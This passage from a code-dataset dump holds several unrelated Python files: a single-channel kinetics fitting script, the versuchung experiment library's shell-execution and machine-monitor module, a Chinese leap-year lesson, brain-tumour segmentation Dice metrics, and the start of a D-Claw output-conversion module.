mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], d, f, name='r', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOO(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nargs = parser.parse_args()\n\nconfig = pd.read_csv(args.config)\nproject = '_'.join(re.split('[_,.]', args.config)[2:-1])\nresults = []\n\nfor file_name in config.file.unique():\n\n single_cell = config[config.loc[:, 'file'] == file_name].copy()\n single_cell.reset_index(inplace=True)\n\n sc_model = single_cell.at[0, 'model']\n sc_type = single_cell.at[0, 'type']\n sc_tres = (single_cell.at[0, 'tres']/1000000)\n sc_tcrit = (single_cell.at[0, 'tcrit']/1000)\n\n # TODO: some integration with real data validation\n # experimental event times, for further analysis, works only for CFO\n # needs to be in a config file, not supported by fit_HJCFIT_config.py\n if sc_model == 'CFO':\n sc_t1_exp = single_cell.at[0, 't1_exp']\n sc_t2_exp = single_cell.at[0, 't2_exp']\n sc_p1_exp = single_cell.at[0, 'p1_exp']\n sc_p2_exp = single_cell.at[0, 'p2_exp']\n # end\n\n sc_scns = list(single_cell.loc[:, 'file_scn'])\n sc_scns = [name if name.endswith('.SCN') else name + '.SCN' for name in sc_scns]\n print(sc_scns)\n\n checked_scns = []\n for scn in sc_scns:\n if scn in (os.listdir()):\n print('SCN file found {}.'.format(scn))\n checked_scns.append(scn)\n elif scn.upper() in (os.listdir()):\n print('SCN file found {}, changing to uppercase.'.format(scn))\n up_scn = scn.upper()\n checked_scns.append(up_scn)\n else:\n print('SCN file not found {}.'.format(scn))\n\n rec = dataset.SCRecord(checked_scns, 100e-9, sc_tres, sc_tcrit)\n rec.record_type = 'recorded'\n rec.printout()\n\n if sc_model == 'CO':\n mec = mechanism_RO([single_cell.at[0, 'beta'], single_cell.at[0, 'alpha']])\n elif sc_model == 'CFO':\n mec = mechanism_RFO([single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'beta'], single_cell.at[0, 'alpha']])\n elif sc_model == 'CFOO':\n mec = mechanism_CFOO([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma']])\n elif sc_model == 'CFOOD':\n mec = mechanism_CFOOD([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'],\n single_cell.at[0, 'r']])\n elif sc_model == 'CFOD':\n mec = mechanism_CFOOD([single_cell.at[0, 'beta'],\n single_cell.at[0, 'alpha'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'],\n single_cell.at[0, 'r']])\n elif sc_model == 'CFOODD':\n mec = mechanism_CFOODD([single_cell.at[0, 'beta'], single_cell.at[0, 'betap'],\n single_cell.at[0, 'alpha'], single_cell.at[0, 'alphap'],\n single_cell.at[0, 'delta'], single_cell.at[0, 'gamma'],\n single_cell.at[0, 'd'], single_cell.at[0, 'dp'],\n single_cell.at[0, 'r'], single_cell.at[0, 'rp']])\n\n mec.update_mr()\n mec.printout(sys.stdout)\n theta = mec.theta()\n\n bursts = rec.bursts.intervals()\n logfac = math.log(10)\n print('\\nFirst likelihood calculation ...')\n print(sc_tres, sc_tcrit)\n likelihood = Log10Likelihood(bursts, mec.kA, sc_tres, sc_tcrit)\n\n print('\\nFirst iter ...')\n iternum = 0\n\n print(\"Minimizing starts\")\n res = minimize(dcprogslik, np.log(theta), method='Nelder-Mead', callback=printiter, )\n\n print('xout', res.x)\n mec.theta_unsqueeze(np.exp(res.x))\n print(\"\\n Final rate constants:\")\n mec.printout(sys.stdout)\n lik = dcprogslik(res.x)\n print(\"\\nFinal likelihood = {0:.6f}\".format(-lik))\n\n # plot and event times of shuts, works only for CFO model\n if sc_model == 'CFO':\n print(scl.printout_distributions(mec, sc_tres))\n shuts = scl.printout_distributions(mec, sc_tres)\n\n t1_mod = shuts.splitlines()[10].split('\\t')[1]\n p1_mod = shuts.splitlines()[10].split('\\t')[2]\n t2_mod = shuts.splitlines()[11].split('\\t')[1]\n p2_mod = shuts.splitlines()[11].split('\\t')[2]\n\n shuts_format = 't1: ' + t1_mod + ' p1: ' + p1_mod + ' t2: ' + t2_mod + ' p2: ' + p2_mod\n\n t, ipdf, epdf, apdf = scpl.shut_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fshut(t)')\n plt.xlabel('Shut time, ms')\n plt.title(file_name + ' ' + sc_type + ' ' + str(sc_tres*1000000) + ' ' + str(sc_tcrit*1000) + '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + file_name.strip('.abf') + '_shut_plot.png')\n plt.close()\n #plt.show()\n\n\n # plot and events times for openings and shuts, works only for complex models\n if sc_model in ['CFOODD', 'CFOOD', 'CFOO']:\n\n event_times_data = scl.printout_distributions(mec, sc_tres)\n print(event_times_data)\n\n event_times_log = open(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_event_times.txt', 'w')\n n = event_times_log.write(event_times_data)\n event_times_log.close()\n\n t, ipdf, epdf, apdf = scpl.shut_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fshut(t)')\n plt.xlabel('Shut time, ms')\n plt.title(sc_type + ' ' + file_name + ' ' + str(sc_tres*1000000) + ' ' + str(sc_tcrit*1000) )#+ '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_shut_plot.png')\n plt.close()\n #plt.show()\n\n t, ipdf, epdf, apdf = scpl.open_time_pdf(mec, sc_tres)\n plt.semilogx(t, ipdf, 'r--', t, epdf, 'b-', t, apdf, 'g-')\n plt.ylabel('fopen(t)')\n plt.xlabel('Open time, ms')\n plt.title(sc_type + ' ' + file_name + ' ' + str(sc_tres * 1000000) + ' ' + str(\n sc_tcrit * 1000)) # + '\\n' + shuts_format)\n print('RED- ideal distribution\\nGREEN- HJC distribution (corrected for missed events)')\n plt.savefig(project + '_' + sc_type + '_' + file_name.strip('.abf') + '_open_plot.png')\n plt.close()\n # plt.show()\n\n # results saving below:\n\n if sc_model == 'CO':\n\n alpha = mec.Rates[0].rateconstants[0]\n beta = mec.Rates[1].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'alpha': alpha, 'beta': beta,\n }\n\n elif sc_model == 'CFO':\n\n alpha = mec.Rates[0].rateconstants[0]\n beta = mec.Rates[1].rateconstants[0]\n gamma = mec.Rates[2].rateconstants[0]\n delta = mec.Rates[3].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'alpha': alpha, 'beta': beta,\n 'gamma': gamma, 'delta': delta,\n 't1_mod': t1_mod, 'p1_mod': p1_mod, 't2_mod': t2_mod, 'p2_mod': p2_mod,\n 't1_exp': sc_t1_exp, 'p1_exp': sc_p1_exp, 't2_exp': sc_t2_exp, 'p2_exp': sc_p2_exp\n }\n\n elif sc_model == 'CFOO':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = mec.Rates[5].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap, 'gamma': gamma}\n\n elif sc_model == 'CFOOD':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = mec.Rates[5].rateconstants[0]\n d = mec.Rates[6].rateconstants[0]\n r = mec.Rates[7].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap,\n 'gamma': gamma, 'delta': delta, 'd': d, 'r': r}\n\n elif sc_model == 'CFOD':\n\n beta = mec.Rates[0].rateconstants[0]\n alpha = mec.Rates[1].rateconstants[0]\n delta = mec.Rates[2].rateconstants[0]\n gamma = mec.Rates[3].rateconstants[0]\n d = mec.Rates[4].rateconstants[0]\n r = mec.Rates[5].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'alpha': alpha,\n 'gamma': gamma, 'delta': delta, 'd': d, 'r': r}\n\n elif sc_model == 'CFOODD':\n\n beta = mec.Rates[0].rateconstants[0]\n betap = mec.Rates[1].rateconstants[0]\n alpha = mec.Rates[2].rateconstants[0]\n alphap = mec.Rates[3].rateconstants[0]\n delta = mec.Rates[4].rateconstants[0]\n gamma = mec.Rates[5].rateconstants[0]\n d = mec.Rates[6].rateconstants[0]\n dp = mec.Rates[7].rateconstants[0]\n r = mec.Rates[8].rateconstants[0]\n rp = mec.Rates[9].rateconstants[0]\n\n refer_result = {'project': project, 'type': sc_type, 'file': file_name, 'model': sc_model,\n 'beta': beta, 'betap': betap, 'alpha': alpha, 'alphap': alphap,\n 'gamma': gamma, 'delta': delta, 'd': d, 'dp': dp, 'r': r, 'rp': rp}\n\n results.append(refer_result)\n\nresults = pd.DataFrame(results)\nprint(results)\nresults.to_csv('hjcfit_rates_' + project + '.csv')\n\n\n","repo_name":"michal2am/bioscripts","sub_path":"single_channel/fit_HJCFIT.py","file_name":"fit_HJCFIT.py","file_ext":"py","file_size_in_byte":15977,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"11971029338","text":"# This file is part of versuchung.\n# \n# versuchung is free software: you can redistribute it and/or modify it under the\n# terms of the GNU General Public License as published by the Free Software\n# Foundation, either version 3 of the License, or (at your option) any later\n# version.\n# \n# versuchung is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE. See the GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License along with\n# versuchung. If not, see <http://www.gnu.org/licenses/>.\n\nfrom subprocess import *\nfrom versuchung.files import CSV_File\nimport logging\nimport os\nimport resource\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\nimport time\nimport pipes\nfrom versuchung.tools import AdviceManager, Advice\nfrom multiprocessing import cpu_count as __cpu_count\n\n\ntry:\n cpu_count = __cpu_count()\nexcept NotImplementedError:\n cpu_count = 1\n\nclass CommandFailed(RuntimeError):\n \"\"\" Indicates that some command failed\n\n Attributes:\n command: the command that failed\n\n returncode: the exitcode of the failed command\n \"\"\"\n def __init__(self, command, returncode, stdout=\"\"):\n assert(returncode != 0)\n self.command = command\n self.returncode = returncode\n self.repr = \"Command %s failed to execute (returncode: %d)\" % \\\n (command, returncode)\n self.stdout = stdout\n RuntimeError.__init__(self, self.repr)\n def __str__(self):\n return self.repr + \"\\n\\nSTDOUT:\\n\" + self.stdout\n\ndef quote_args(args):\n if len(args) == 1 and type(args[0]) == dict:\n ret = {}\n for k,v in args[0].items():\n ret[k] = pipes.quote(v)\n return ret\n elif type(args) == list or type(args) == tuple:\n args = tuple([pipes.quote(x) for x in args])\n else:\n assert False\n return args\n\n\ndef __shell(failok, command, *args, **kwargs):\n os.environ[\"LC_ALL\"] = \"C\"\n\n args = quote_args(args)\n command = command % args\n\n options = {'stdout': PIPE, 'stderr': STDOUT,\n 'shell': True, 'universal_newlines': True}\n options.update(**kwargs)\n\n logging.debug(\"executing: \" + command)\n p = Popen(command, **options)\n stdout = \"\"\n while True:\n x = p.stdout.readline()\n if not x:\n break\n stdout += x\n logging.debug(\"stdout|%s\", x.replace(\"\\n\", \"\"))\n p.wait()\n if len(stdout) > 0 and stdout[-1] == '\\n':\n stdout = stdout[:-1]\n\n if not failok and p.returncode != 0:\n raise CommandFailed(command, p.returncode, stdout)\n\n return (stdout.__str__().rsplit('\\n'), p.returncode)\n\n\n@AdviceManager.advicable\ndef shell(command, *args, **kwargs):\n \"\"\"\n | Executes ``args[0] % args[:1]`` in a shell.\n | Keyword Arguments are passed through to the corresponding ``Popen()`` call.\n | By default the following kwargs are passed:\n\n +------------------------+----------------------+\n | Keyword | Value |\n +========================+======================+\n | ``shell`` | ``True`` |\n +------------------------+----------------------+\n | ``stdout`` | ``subprocess.PIPE`` |\n +------------------------+----------------------+\n | ``stderr`` | ``subprocess.STDOUT``|\n +------------------------+----------------------+\n | ``universal_newlines``| ``True`` |\n +------------------------+----------------------+\n\n .. note::\n\n The following command enables capturing `stderr`, `stdout` and\n runtime information (with `/usr/bin/time`)::\n\n shell.track(experiment.path)\n\n .. note::\n\n Tracking is enabled automatically after setup. It can be disabled\n and re-enabled while running the experiment with::\n\n >> shell.track.disable()\n >> shell.track.enable()\n\n The tracking feature creates files like ``shell_0_time``,\n ``shell_0_stderr``, and so on. These files are created in the\n ``experiment.path`` directory.\n\n .. note::\n\n To write the results of the tracking feature into the experiment\n output folder, use ``self.path`` within a :meth:`run()` method of\n an experiment::\n\n shell.track(experiment.path)\n\n\n :rtype: a tuple with:\n\n 1. the command's standard output as list of lines\n 2. the exitcode\n\n :raises: :exc:`CommandFailed` if the returncode is != 0\n \"\"\"\n return __shell(False, command, *args, **kwargs)\n\n@AdviceManager.advicable\ndef shell_failok(command, *args, **kwargs):\n \"\"\"Like :meth:`.shell`, but the throws no exception\"\"\"\n return __shell(True, command, *args, **kwargs)\n\n\ndef add_sys_path(path):\n \"\"\"Add path to the PATH environment variable\"\"\"\n os.environ[\"PATH\"] = path + \":\" + os.environ[\"PATH\"]\n\nclass AdviceShellTracker(Advice):\n def __call__(self, base_directory):\n self.base_directory = base_directory\n assert os.path.isdir(base_directory)\n self.count = 0\n # Enable the Advice\n self.enable()\n \n def around(self, func, args, kwargs):\n assert len(args) > 0\n command = args[0]\n import versuchung.execute\n args = versuchung.execute.quote_args(list(args)[1:])\n command = command % args\n\n cmd = \"/usr/bin/time --verbose -o %s_time sh -c %s 2> %s_stderr\"\n base = os.path.join(self.base_directory, \"shell_%d\" % self.count)\n self.count += 1\n args = tuple([cmd, base, command, base])\n\n # Dump away stdout\n ret = func(args, kwargs)\n with open(base + \"_stdout\", \"w+\") as fd:\n fd.write(\"\\n\".join(ret[0]) + \"\\n\")\n return ret\n\nshell.track = AdviceShellTracker(\"versuchung.execute.shell\")\nshell_failok.track = AdviceShellTracker(\"versuchung.execute.shell_failok\")\n\n\n\nclass MachineMonitor(CSV_File):\n \"\"\"Can be used as: **input parameter** and **output parameter**\n\n With this parameter the systems status during the experiment can\n be monitored. The tick interval can specified on creation and also\n what values should be captured.\n\n This parameter creates a :class:`~versuchung.files.CSV_File` with\n the given name. When the experiment starts the monitor fires up a\n thread which will every ``tick_interval`` milliseconds capture the\n status of the system and store the information as a row in the\n normal csv.\n\n A short example::\n\n class SimpleExperiment(Experiment):\n outputs = {\"ps\": MachineMonitor(\"ps_monitor\", tick_interval=100)}\n\n def run(self):\n shell(\"sleep 1\")\n shell(\"seq 1 100000 | while read a; do echo > /dev/null; done\")\n shell(\"sleep 1\")\n\n experiment = SimpleExperiment()\n experiment(sys.argv)\n\n >>> experiment.o.ps.extract([\"time\", \"net_send\"])\n [[1326548338.701827, 0],\n [1326548338.810422, 3],\n [1326548338.913667, 0],\n [1326548339.016836, 0],\n [1326548339.119982, 2],\n ....\n\n \"\"\"\n def __init__(self, default_filename = \"\", tick_interval=100, capture = [\"cpu\", \"mem\", \"net\", \"disk\"]):\n CSV_File.__init__(self, default_filename)\n self.tick_interval = tick_interval\n self.__running = True\n self.capture = capture\n\n def __get_cpu(self):\n return [self.psutil.cpu_percent()]\n\n def __get_memory(self):\n phymem = self.psutil.virtual_memory()\n virtmem = self.psutil.swap_memory()\n cached = self.psutil.virtual_memory().cached\n buffers = self.psutil.virtual_memory().buffers\n\n return [phymem.total, phymem.used, phymem.free,\n virtmem.total, virtmem.used, virtmem.free,\n cached, buffers]\n\n def __get_net(self):\n if not hasattr(self, \"old_network_stat\"):\n self.old_network_stat = self.psutil.net_io_counters()\n stat = self.psutil.net_io_counters()\n ret = [stat.bytes_sent - self.old_network_stat.bytes_sent,\n stat.bytes_recv - self.old_network_stat.bytes_recv]\n self.old_network_stat = stat\n return ret\n\n def __get_disk(self):\n if not hasattr(self, \"old_disk_stat\"):\n self.old_disk_stat = self.psutil.disk_io_counters()\n stat = self.psutil.disk_io_counters()\n ret = [stat.read_bytes - self.old_disk_stat.read_bytes,\n stat.write_bytes - self.old_disk_stat.write_bytes]\n self.old_disk_stat = stat\n return ret\n\n\n def monitor_thread(self):\n try:\n import psutil\n self.psutil = psutil\n except ImportError:\n raise RuntimeError(\"Please install psutil to use PsMonitor\")\n\n while self.__running:\n row = [time.time()]\n if \"cpu\" in self.capture:\n row += self.__get_cpu()\n else:\n row += [-1]\n\n if \"mem\" in self.capture:\n row += self.__get_memory()\n else:\n row += [-1,-1,-1,-1,-1,-1,-1,-1]\n\n if \"net\" in self.capture:\n row += self.__get_net()\n else:\n row += [-1,-1]\n\n if \"disk\" in self.capture:\n row += self.__get_disk()\n else:\n row += [-1,-1]\n\n assert len(row) == len(self.sample_keys)\n self.append(row)\n\n\n time.sleep(self.tick_interval/1000.0)\n\n def inp_extract_cmdline_parser(self, opts, args):\n CSV_File.inp_parser_extract(self, opts, None)\n self.event_file = CSV_File(self.path + \".events\")\n\n def before_experiment_run(self, parameter_type):\n if parameter_type == \"output\":\n CSV_File.before_experiment_run(self, \"output\")\n self.event_file = CSV_File(self.path + \".events\")\n self.event_file.before_experiment_run(\"output\")\n self.thread = thread.start_new_thread(self.monitor_thread, tuple())\n\n def after_experiment_run(self, parameter_type):\n if parameter_type == \"output\":\n self.__running = False\n time.sleep(self.tick_interval/1000.0)\n CSV_File.after_experiment_run(self, \"output\")\n self.event_file.after_experiment_run(\"output\")\n\n\n sample_keys = [\"time\", \"cpu_percentage\",\n \"phymem_total\", \"phymem_used\", \"phymem_free\",\n \"virtmem_total\", \"virtmem_used\", \"virtmem_free\",\n \"cached\", \"buffers\", \"net_send\", \"net_recv\",\n \"disk_read\", \"disk_write\"]\n\n \"\"\"The various fields in the csv file are organized like the\n strings in this list. E.g. The unix time is the first field of the\n csv file.\"\"\"\n\n\n def extract(self, keys = [\"time\", \"cpu_percentage\"]):\n \"\"\"Extract single columns from the captured\n information. Useful keys are defined in\n :attr:`~.sample_keys`\"\"\"\n indices = [self.sample_keys.index(x) for x in keys]\n ret = []\n for row in self.value:\n r = []\n for index in indices:\n r.append(row[index])\n ret.append(r)\n return ret\n","repo_name":"stettberger/versuchung","sub_path":"versuchung/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"35391428334","text":"# 变量和获取输入\n# 变量是用来存储各种值的\n# 有哪些类型的值可以存在变量里:\n# +1 / -1 / 0 - 整数 - int(eger)\n# 1/2 - 浮点数\n# 3.1415 - 浮点数\n# \"Fiona\" - 字符串\n# [1, 2, 3, 4, 5] - list, 列表\n#\n# 真 / 假 => 布尔变量 => True / False\n# 2 > 1, 1/2 等于 0.5 => True\n# 1 > 2, 1/2 大于 0.5 => False\n#\n# (我们写的这个程序)获取(执行我们这个程序的人)输入\n# input - 获取用户输入的函数\n# 我们如何能得到用户的这个输入?\n# name = input(\"Please input your name: \")\n\n# 打印变量 name 的值\n# Your name is: ?????\n# f(ormat)-String: 格式字符串\n# print(f\"Your name is: {name}\")\n\n# 写一个程序,输入一个年份,输出这个年份是不是闰年。\nyear = input(\"Please input the year:\")\n# 从 input 获取到的值的类型是字符串\n# 此时,我们从键盘获取的用户输入 year,这里面保存的是一个字符串。\n# ** 从 input 获取到的任何输入,他的类型都是字符串。**\n\n# 判断 year 的值是不是一个闰年\nyear = int(year) # \"2000\" => 2000\n\n\n# 判读闰年的方法?\n# ** 如果年份可以被 400 整除,那么这年是个闰年 **\n# % 运算符 - 计算两个数字相除的余数\n# 6 % 2 = 0\n# 8 % 5 = 3\n# 1 除以 9 = 1 里面包含多少个 9 = 0\n# 1 除以 9 商 0 余 1\n# 3 除以 7 = 3 里面包含多少 7 = 0\n# 3 除以 7 商 0 余 3\n# 6 % 9 = 6\n# 1 % 8 = 1\n# 判断 year % 400 是否等于 0\n#\n\ndef is_leap_year(y: int) -> bool:\n if y % 400 == 0:\n return True\n elif y % 4 == 0 and y % 100 != 0:\n return True\n else:\n return False\n\n\nif is_leap_year(year):\n print(f\"{year} is leap year.\")\nelse:\n print(f\"{year} is not leap year.\")\n","repo_name":"puretears/fiona-python-essential","sub_path":"0102.py","file_name":"0102.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16626833091","text":"eps = 1e-5\ndef f1_score(o, t):\n num = 2*(o*t).sum() + eps\n den = o.sum() + t.sum() + eps\n return num/den\n\n\n#https://github.com/ellisdg/3DUnetCNN\n#https://github.com/ellisdg/3DUnetCNN/blob/master/brats/evaluate.py\n#https://github.com/MIC-DKFZ/BraTS2017/blob/master/utils_validation.py\ndef dice(output, target):\n ret = []\n # whole\n o = output > 0; t = target > 0\n ret += f1_score(o, t),\n # core\n o = (output==1) | (output==4)\n t = (target==1) | (target==4)\n ret += f1_score(o , t),\n # active\n o = (output==4); t = (target==4)\n ret += f1_score(o , t),\n\n return ret\n\nkeys = 'whole', 'core', 'enhancing', 'loss'","repo_name":"zwxu064/RANP","sub_path":"third_party/miccai/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16111049708","text":"#!/usr/bin/python\n\"\"\"\nfile: fortconvert\n=========\n Provides several functions\n for manipulating output data in AMR files, fort.qXXXX\n into other formats of grids with non-overlapping data (scattered, uniform, topotype)\n\n Contains:\n\n convertfortdir (convert entire directory or files from directory)\n fort2topotype (create file in the form of topotype for a single component of q or b.)\n fort2xyqscatter (finest grid data for entire domain as x,y,q scattered data)\n fort2refined (covert fort.qXXXX with amr into a single uniform grid with highest level spacing)\n fort2uniform (covert fort.qXXXX with amr into a single uniform grid with user defined spacing)\n fort2griddata\n fort2griddata_vector\n fort2griddata_framenumbers\n fort2list (used to read fort data...4.x compatible...)\n forttheaderread\n fortqheaderread\n forttheaderwrite\n fortqheaderwrite\n pointfromfort\n intersection\n griddata2fort\n array2fort\n\n\n Future plans:\n probably should use the pyclaw solution class rather than solutionlist\n or at least provide options for both.\n\n provide conversion to clawpack netcdf and possibly other binary formats.\n\n Note:\n this was done expeditiously and might be inefficient or bug infested\n (KRB 2022.06.14): x,y locations considered here represent CELL CENTERS\n rather than lower left corner of cells.\n\n David George dgeorge@uw.edu 2014.05.20\n\n\"\"\"\n\nimport copy\nimport os\nimport string\n\nimport numpy as np\n\nimport dclaw.topotools as gt\nimport dclaw.netcdf_tools as gn\n\n\n# ================================================================================\ndef convertfortdir(\n outputtype,\n nplots=\"fort.nplot\",\n outputname=\"fort.q\",\n components=\"all\",\n outdir=None,\n fortdir=None,\n parallel=False,\n num_cores=1,\n **kwargs\n):\n\n \"\"\"\n convert an entire directory of fort.q files to another form\n\n arguments:\n ---------\n outputtype: 'scattered','topotype' , 'fortrefined' , 'fortuniform'\n Note: only scattered option retains actual non-interpolated output, generally.\n --scattered: highest level data as columns x,y,q\n --topotype: like a DEM with a single component of q (useful for GIS software)\n --fortrefined: standard clawpack output style, but a single grid at highest resolution\n --fortuniform: standard clawpack output style, but a single grid with user defined grid parameters.\n nplots: integer for the number of plots, list of plots or fort.nplot filename\n a sinlge integer will be all plots up to that integer\n for individual plots make nplots a list\n outputname: the base name of the output files...filenames will be appended with frameno\n components: for scattered and fort a list of components q, or 'all'\n For topotype it must be an integer to select the single component of q, or 'topo' to get eta-h,\n or 'depth' to get nodata_value where h=0...for plotting purposes.\n outdir: specify a directory for files to go in relative to cwd\n fortdir: location of fort.q files if not ./\n parallel: bool flag whether to use parallel processing (needs joblib, default false)\n num_cores: num cores to use if doing parallel (default 1)\n topotype: topotype to output to. If provided when using \"fortrefined\" or \"fortuniform\",\n output will get written to the specified topotype instead of to the standard\n fort.qXXX file type. A fort.tXXXX will also get written. The geotiff will have\n the name fort_qXXXX.tif\n **kwargs: for topotype: xll,yll,cellsize,ncols,nrows,topotype = 1,2,3,'gdal', 'gtif' (for standard gdal/esri header)\n for fortuniform: xlower,ylower,mx,my\n if using topotype=\"gtif\" can provide epsg=XXXX (EPSG code for CRS)\n if kwargs are omitted the grid parameters are taken from the fort file with finest level spacing\n\n\n \"\"\"\n\n if not fortdir:\n fortdir = \".\"\n\n if not outdir:\n outdir = \".\"\n elif not os.path.isdir(outdir):\n os.system((\"mkdir \" + outdir))\n\n curdir = os.path.abspath(os.path.curdir)\n fortdir = os.path.abspath(fortdir)\n outdir = os.path.abspath(outdir)\n\n write_level = kwargs.get(\"write_level\", False)\n east = kwargs.get(\"east\", None)\n west = kwargs.get(\"west\", None)\n south = kwargs.get(\"south\", None)\n north = kwargs.get(\"north\", None)\n\n bilinear = kwargs.get(\"bilinear\", True)\n\n if east is not None and west is not None:\n assert east > west\n if north is not None and south is not None:\n assert north > south\n\n epsg = kwargs.get(\"epsg\", None)\n\n if outputtype == \"topotype\":\n try:\n xll = kwargs[\"xll\"]\n yll = kwargs[\"yll\"]\n nrows = kwargs[\"nrows\"]\n ncols = kwargs[\"ncols\"]\n cellsize = kwargs[\"cellsize\"]\n except:\n print(\"using grid parameters from fort.qXXXX files\")\n xll = None\n yll = None\n nrows = None\n ncols = None\n cellsize = None\n\n try:\n topotype = kwargs[\"topotype\"]\n except:\n topotype = 2\n\n if outputtype == \"fortuniform\":\n try:\n xlower = kwargs[\"xlower\"]\n ylower = kwargs[\"ylower\"]\n xupper = kwargs[\"xupper\"]\n yupper = kwargs[\"yupper\"]\n mx = kwargs[\"mx\"]\n my = kwargs[\"my\"]\n\n except:\n print(\n \"for outputtype==fortuniform you must provide xlower,ylower,xupper,yupper,mx,my as kwargs\"\n )\n raise ValueError()\n\n if isinstance(nplots, str):\n nplotfile = os.path.join(fortdir, nplots)\n fin = open(nplotfile, \"r\")\n nplots = fin.readline()\n nplots = int(nplots)\n nplots = np.arange(nplots + 1)\n fin.close()\n elif isinstance(nplots, int):\n nplots = np.arange(nplots + 1)\n print((\"converting frames 0 - %s\" % (nplots)))\n print(\"to convert individual frames, call with nplots = a list of frames\")\n else:\n nplots = np.array(nplots, dtype=int)\n\n os.chdir(fortdir)\n\n arg_list = []\n\n for frameno in nplots:\n numstring = str(10000 + frameno)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n # print(('converting '+os.path.join(fortdir,fortqname)))\n outfname = os.path.join(outdir, outputname + framenostr)\n\n # print(('writing to ' +outfname))\n\n if outputtype == \"scattered\":\n _func = fort2xyqscattered\n arg_list.append([frameno, outfname, components])\n\n elif outputtype == \"topotype\":\n _func = fort2topotype\n arg_list.append(\n [\n frameno,\n outfname,\n fortdir,\n xll,\n yll,\n cellsize,\n ncols,\n nrows,\n components,\n topotype,\n bilinear\n ]\n )\n\n elif outputtype == \"fortrefined\":\n outfortt = os.path.join(outdir, \"fort.t\" + 